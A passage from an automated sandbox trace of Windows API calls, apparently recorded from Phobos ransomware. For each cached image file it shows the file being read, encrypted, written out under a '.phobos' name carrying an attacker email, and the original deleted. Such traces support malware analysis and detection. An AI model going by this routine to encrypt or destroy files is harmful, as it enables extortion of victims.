hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0169.363] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.363] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0169.363] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.363] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0169.363] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0169.363] CloseHandle (hObject=0x190) returned 1 [0169.363] CloseHandle (hObject=0x158) returned 1 [0169.363] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB46JmN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb46jmn[1].png")) returned 1 [0169.364] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0169.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kJAC[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5kjac[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0169.365] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=288) returned 1 [0169.365] CloseHandle (hObject=0x158) returned 1 [0169.365] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kJAC[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5kjac[1].png")) returned 0x2020 [0169.365] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kJAC[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5kjac[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kJAC[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5kjac[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0169.365] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.366] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kJAC[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5kjac[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0169.366] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0169.366] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.366] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x120, lpOverlapped=0x0) returned 1 [0169.973] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x130, dwBufLen=0x130 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x130) returned 1 [0169.973] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x130, lpOverlapped=0x0) returned 1 [0169.974] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0169.974] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.974] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0169.974] CryptDestroyKey (hKey=0xa327e8) returned 1 [0169.974] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0169.974] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0169.974] CloseHandle (hObject=0x158) returned 1 [0169.974] CloseHandle (hObject=0x190) returned 1 [0169.975] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kJAC[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5kjac[1].png")) returned 1 [0169.975] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0169.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kTiV[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5ktiv[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0169.976] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=289) returned 1 [0169.977] CloseHandle (hObject=0x190) returned 1 [0169.977] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kTiV[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5ktiv[1].png")) returned 0x2020 [0169.977] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kTiV[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5ktiv[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kTiV[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5ktiv[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0169.977] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.977] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kTiV[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5ktiv[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0169.977] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0169.977] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.977] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x121, lpOverlapped=0x0) returned 1 [0170.002] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x130, dwBufLen=0x130 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x130) returned 1 [0170.002] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x130, lpOverlapped=0x0) returned 1 [0170.002] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0170.002] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0170.002] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0170.002] CryptDestroyKey (hKey=0xa32c68) returned 1 [0170.002] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0170.003] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0170.003] CloseHandle (hObject=0x190) returned 1 [0170.003] CloseHandle (hObject=0x158) returned 1 [0170.003] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kTiV[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5ktiv[1].png")) returned 1 [0170.004] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0170.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB6Ma4a[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb6ma4a[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0170.004] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=396) returned 1 [0170.004] CloseHandle (hObject=0x158) returned 1 [0170.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB6Ma4a[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb6ma4a[1].png")) returned 0x2020 [0170.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB6Ma4a[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb6ma4a[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0170.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB6Ma4a[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb6ma4a[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0170.004] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0170.004] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0170.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB6Ma4a[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb6ma4a[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0170.005] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0170.005] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0170.005] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x18c, lpOverlapped=0x0) returned 1 [0171.431] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x190, dwBufLen=0x190 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x190) returned 1 [0171.431] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x190, lpOverlapped=0x0) returned 1 [0171.432] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0171.432] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0171.432] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0171.432] CryptDestroyKey (hKey=0xa32c68) returned 1 [0171.432] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0171.433] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0171.433] CloseHandle (hObject=0x158) returned 1 [0171.433] CloseHandle (hObject=0x190) returned 1 [0171.433] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB6Ma4a[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb6ma4a[1].png")) returned 1 [0171.434] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0171.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB74fLs[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb74fls[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0171.435] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=360) returned 1 [0171.435] CloseHandle (hObject=0x190) returned 1 [0171.435] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB74fLs[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb74fls[1].png")) returned 0x2020 [0171.435] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB74fLs[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb74fls[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0171.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB74fLs[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb74fls[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0171.435] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0171.435] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0171.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB74fLs[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb74fls[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0171.436] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0171.436] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0171.436] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x168, lpOverlapped=0x0) returned 1 [0171.572] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x170, dwBufLen=0x170 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x170) returned 1 [0171.572] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x170, lpOverlapped=0x0) returned 1 [0171.573] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0171.573] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0171.573] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0171.573] CryptDestroyKey (hKey=0xa32c68) returned 1 [0171.573] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0172.833] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0172.833] CloseHandle (hObject=0x190) returned 1 [0172.833] CloseHandle (hObject=0x158) returned 1 [0172.833] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB74fLs[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb74fls[1].png")) returned 1 [0172.834] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0172.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBIqq8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbiqq8[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0172.877] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13119) returned 1 [0172.877] CloseHandle (hObject=0x190) returned 1 [0172.877] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBIqq8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbiqq8[1].jpg")) returned 0x2020 [0172.878] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBIqq8[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbiqq8[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0172.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBIqq8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbiqq8[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 